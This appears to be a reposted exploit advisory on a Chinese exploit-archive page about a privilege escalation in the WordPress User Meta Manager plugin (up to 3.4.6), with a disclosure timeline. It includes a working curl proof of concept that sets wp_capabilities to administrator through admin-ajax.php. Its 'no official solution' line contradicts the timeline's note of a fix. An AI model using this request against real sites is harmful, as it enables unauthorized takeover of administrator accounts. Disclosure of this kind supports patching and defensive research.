扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 |
* Exploit Title: WordPress User Meta Manager Plugin [Privilege Escalation] * Discovery Date: 2015/12/28 * Public Disclosure Date: 2016/02/04 * Exploit Author: Panagiotis Vagenas * Contact: https://twitter.com/panVagenas * Vendor Homepage: http://jasonlau.biz/home/ * Software Link: https://wordpress.org/plugins/user-meta-manager/ * Version: 3.4.6 * Tested on: WordPress 4.4.1 * Category: webapps Description ================================================================================ User Meta Manager for WordPress plugin up to v3.4.6 suffers from a privilege escalation vulnerability. A registered user can modify the meta information of any registered user, including himself. This way he can modify <code>wp_capabilities meta to escalate his account to a full privileged administrative account. PoC ================================================================================ curl -c ${USER_COOKIES} \ -d "mode=edit&umm_meta_value[]=a:1:{s:13:\"administrator\";b:1;}\ &umm_meta_key[]=wp_capabilities" \ "http://${VULN_SITE}/wp-admin/admin-ajax.php\?action=umm_switch_action\ &umm_sub_action=umm_update_user_meta&umm_user=${USER_ID}" Timeline ================================================================================ 2015/12/28 - Discovered 2015/12/29 - Vendor notified via support forums in WordPress.org 2015/12/29 - Vendor notified via contact form in his site 2016/01/29 - WordPress security team notified about the issue 2016/02/02 - Vendor released version 3.4.7 2016/02/02 - Verified that this exploit no longer applies in version 3.4.7 Solution ================================================================================ No official solution yet exists. |
体验盒子
